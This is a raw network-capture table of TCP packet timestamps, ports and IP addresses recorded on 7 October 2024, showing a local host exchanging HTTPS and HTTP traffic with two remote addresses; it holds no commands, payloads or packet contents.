Oct 7, 2024 03:15:33.332127094 CEST	443	49789	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.332149982 CEST	443	49789	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.332209110 CEST	443	49789	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.332210064 CEST	49789	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.332266092 CEST	49789	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.332504034 CEST	49789	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.332519054 CEST	443	49789	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.332547903 CEST	49789	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.332555056 CEST	443	49789	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.335402966 CEST	49794	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.335417032 CEST	443	49794	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.335522890 CEST	49794	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.335741043 CEST	49794	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.335755110 CEST	443	49794	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.343136072 CEST	443	49791	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.343236923 CEST	443	49791	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.343380928 CEST	49791	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.343441010 CEST	49791	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.343441010 CEST	49791	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.343457937 CEST	443	49791	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.343477964 CEST	443	49791	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.343847036 CEST	443	49790	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.343898058 CEST	443	49790	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.343975067 CEST	49790	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.344115019 CEST	49790	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.344136953 CEST	443	49790	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.344149113 CEST	49790	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.344156027 CEST	443	49790	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.346434116 CEST	49795	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.346467018 CEST	443	49795	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.346615076 CEST	49795	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.346704960 CEST	49795	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.346716881 CEST	443	49795	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.346746922 CEST	49796	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.346821070 CEST	443	49796	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.346904039 CEST	49796	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.347096920 CEST	49796	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.347126007 CEST	443	49796	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.360902071 CEST	443	49792	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.360918999 CEST	443	49792	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.360954046 CEST	443	49792	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.361028910 CEST	49792	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.361076117 CEST	49792	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.361300945 CEST	49792	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.361314058 CEST	443	49792	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.361325026 CEST	49792	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.361330986 CEST	443	49792	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.364111900 CEST	49797	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.364146948 CEST	443	49797	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.364236116 CEST	49797	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.364379883 CEST	49797	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.364394903 CEST	443	49797	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.524466991 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:33.524537086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:33.524580956 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:33.524636030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:33.527439117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:33.534347057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:33.972507000 CEST	443	49794	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.973736048 CEST	49794	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.973800898 CEST	443	49794	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.974299908 CEST	49794	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.974306107 CEST	443	49794	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.980989933 CEST	443	49793	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.981641054 CEST	49793	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.981657982 CEST	443	49793	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.982011080 CEST	49793	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.982019901 CEST	443	49793	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.988116980 CEST	443	49795	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.988615990 CEST	49795	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.988684893 CEST	443	49795	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.988696098 CEST	443	49796	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.989089012 CEST	49795	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.989104033 CEST	443	49795	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.989155054 CEST	49796	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.989236116 CEST	443	49796	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.989712954 CEST	49796	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.989728928 CEST	443	49796	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.041832924 CEST	443	49797	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.042640924 CEST	49797	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.042679071 CEST	443	49797	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.043267012 CEST	49797	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.043273926 CEST	443	49797	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.075782061 CEST	443	49794	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.075845957 CEST	443	49794	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.076008081 CEST	443	49794	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.076229095 CEST	49794	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.076282978 CEST	49794	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.076702118 CEST	49794	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.076702118 CEST	49794	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.076725960 CEST	443	49794	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.076744080 CEST	443	49794	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.080456972 CEST	49798	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.080497980 CEST	443	49798	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.080590010 CEST	49798	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.080784082 CEST	49798	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.080799103 CEST	443	49798	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.083113909 CEST	443	49793	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.083178997 CEST	443	49793	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.083259106 CEST	49793	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.083280087 CEST	443	49793	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.083338976 CEST	443	49793	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.083367109 CEST	49793	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.083408117 CEST	49793	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.083457947 CEST	49793	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.083457947 CEST	49793	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.083472013 CEST	443	49793	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.083481073 CEST	443	49793	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.086241961 CEST	49799	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.086340904 CEST	443	49799	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.086436033 CEST	49799	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.086581945 CEST	49799	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.086617947 CEST	443	49799	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.086951017 CEST	443	49795	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.087127924 CEST	443	49795	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.087198019 CEST	49795	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.087281942 CEST	49795	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.087328911 CEST	443	49795	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.087357998 CEST	49795	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.087373972 CEST	443	49795	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.087619066 CEST	443	49796	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.087721109 CEST	443	49796	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.087789059 CEST	49796	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.087842941 CEST	49796	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.087869883 CEST	443	49796	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.087894917 CEST	49796	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.087908030 CEST	443	49796	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.089766979 CEST	49800	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.089819908 CEST	443	49800	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.089907885 CEST	49800	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.089932919 CEST	49801	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.089982986 CEST	443	49801	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.090043068 CEST	49801	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.090070009 CEST	49800	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.090099096 CEST	443	49800	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.090193033 CEST	49801	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.090210915 CEST	443	49801	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.143866062 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:34.143891096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:34.143903971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:34.143934011 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:34.143953085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:34.143968105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:34.143986940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:34.143999100 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:34.144007921 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:34.144042969 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:34.145891905 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:34.145919085 CEST	443	49797	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.146080017 CEST	443	49797	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.146141052 CEST	49797	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.146291018 CEST	49797	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.146310091 CEST	443	49797	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.146322012 CEST	49797	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.146327972 CEST	443	49797	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.150245905 CEST	49802	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.150321007 CEST	443	49802	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.150404930 CEST	49802	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.150688887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:34.150913000 CEST	49802	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.150949955 CEST	443	49802	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.723325968 CEST	443	49799	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.724400043 CEST	49799	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.724463940 CEST	443	49799	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.724802971 CEST	49799	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.724817038 CEST	443	49799	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.725019932 CEST	443	49801	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.725418091 CEST	49801	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.725501060 CEST	443	49801	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.725986958 CEST	49801	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.726001978 CEST	443	49801	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.735059977 CEST	443	49800	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.735541105 CEST	49800	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.735608101 CEST	443	49800	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.735959053 CEST	49800	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.735974073 CEST	443	49800	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.744719982 CEST	443	49798	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.745089054 CEST	49798	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.745116949 CEST	443	49798	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.745554924 CEST	49798	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.745560884 CEST	443	49798	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.761051893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:34.761177063 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:34.803546906 CEST	443	49802	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.805047035 CEST	49802	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.805077076 CEST	443	49802	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.805681944 CEST	49802	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.805689096 CEST	443	49802	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.821670055 CEST	443	49799	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.821897984 CEST	443	49799	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.822305918 CEST	49799	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.822407961 CEST	49799	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.822408915 CEST	49799	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.822457075 CEST	443	49799	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.822488070 CEST	443	49799	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.824213982 CEST	443	49801	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.824368000 CEST	443	49801	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.824419022 CEST	49801	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.824812889 CEST	49801	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.824827909 CEST	443	49801	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.824842930 CEST	49801	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.824850082 CEST	443	49801	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.828504086 CEST	49803	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.828593969 CEST	443	49803	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.828676939 CEST	49803	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.829896927 CEST	49804	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.829993010 CEST	443	49804	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.830059052 CEST	49804	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.830319881 CEST	49803	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.830347061 CEST	443	49803	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.830468893 CEST	49804	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.830506086 CEST	443	49804	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.834041119 CEST	443	49800	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.834189892 CEST	443	49800	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.834254980 CEST	49800	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.834326982 CEST	49800	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.834326982 CEST	49800	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.834353924 CEST	443	49800	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.834377050 CEST	443	49800	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.836664915 CEST	49805	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.836700916 CEST	443	49805	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.836850882 CEST	49805	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.836900949 CEST	49805	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.836909056 CEST	443	49805	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.847100973 CEST	443	49798	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.847254992 CEST	443	49798	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.847306967 CEST	49798	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.847366095 CEST	49798	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.847388983 CEST	443	49798	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.847413063 CEST	49798	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.847419977 CEST	443	49798	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.850702047 CEST	49806	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.850734949 CEST	443	49806	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.850795031 CEST	49806	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.850940943 CEST	49806	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.850956917 CEST	443	49806	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.903862953 CEST	443	49802	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.904016018 CEST	443	49802	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.904262066 CEST	49802	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.904876947 CEST	49802	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.904876947 CEST	49802	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.904913902 CEST	443	49802	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.904934883 CEST	443	49802	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.913732052 CEST	49807	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.913784981 CEST	443	49807	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.913984060 CEST	49807	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.924455881 CEST	49807	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:34.924504042 CEST	443	49807	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:34.966438055 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:34.966439009 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:34.971620083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:34.971659899 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:34.971720934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:34.971750975 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:34.971779108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:34.971812010 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:34.971843004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:35.482006073 CEST	443	49805	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.483099937 CEST	49805	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.483117104 CEST	443	49805	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.483645916 CEST	49805	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.483652115 CEST	443	49805	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.489171028 CEST	443	49804	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.489562988 CEST	49804	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.489630938 CEST	443	49804	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.489981890 CEST	49804	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.489996910 CEST	443	49804	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.500926971 CEST	443	49803	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.501360893 CEST	49803	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.501393080 CEST	443	49803	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.501995087 CEST	49803	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.502002001 CEST	443	49803	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.568883896 CEST	443	49806	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.575624943 CEST	49806	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.575637102 CEST	443	49806	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.577231884 CEST	49806	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.577239037 CEST	443	49806	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.581825018 CEST	443	49805	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.582009077 CEST	443	49805	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.582113028 CEST	443	49805	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.582130909 CEST	49805	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.582247972 CEST	49805	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.588326931 CEST	49805	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.588326931 CEST	49805	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.588349104 CEST	443	49805	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.588366032 CEST	443	49805	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.589394093 CEST	443	49804	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.589679956 CEST	443	49804	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.589761019 CEST	49804	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.589847088 CEST	49804	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.589890957 CEST	443	49804	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.589960098 CEST	443	49807	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.590673923 CEST	49807	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.590701103 CEST	443	49807	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.591640949 CEST	49807	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.591656923 CEST	443	49807	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.597515106 CEST	49808	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.597596884 CEST	443	49808	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.597671986 CEST	49808	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.597899914 CEST	49808	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.597920895 CEST	443	49808	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.597950935 CEST	49809	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.598050117 CEST	443	49809	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.598130941 CEST	49809	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.598249912 CEST	49809	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.598287106 CEST	443	49809	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.600879908 CEST	443	49803	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.601289988 CEST	443	49803	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.601361990 CEST	49803	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.601459980 CEST	49803	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.601488113 CEST	443	49803	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.601502895 CEST	49803	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.601511002 CEST	443	49803	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.608393908 CEST	49810	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.608484983 CEST	443	49810	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.608567953 CEST	49810	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.608896971 CEST	49810	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.608926058 CEST	443	49810	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.672494888 CEST	443	49806	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.672687054 CEST	443	49806	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.672744989 CEST	49806	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.672884941 CEST	49806	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.672884941 CEST	49806	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.672903061 CEST	443	49806	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.672914028 CEST	443	49806	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.676552057 CEST	49811	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.676611900 CEST	443	49811	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.676697969 CEST	49811	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.676887035 CEST	49811	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.676907063 CEST	443	49811	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.688549995 CEST	443	49807	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.688637972 CEST	443	49807	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.688703060 CEST	49807	443	192.168.2.5	13.107.246.45
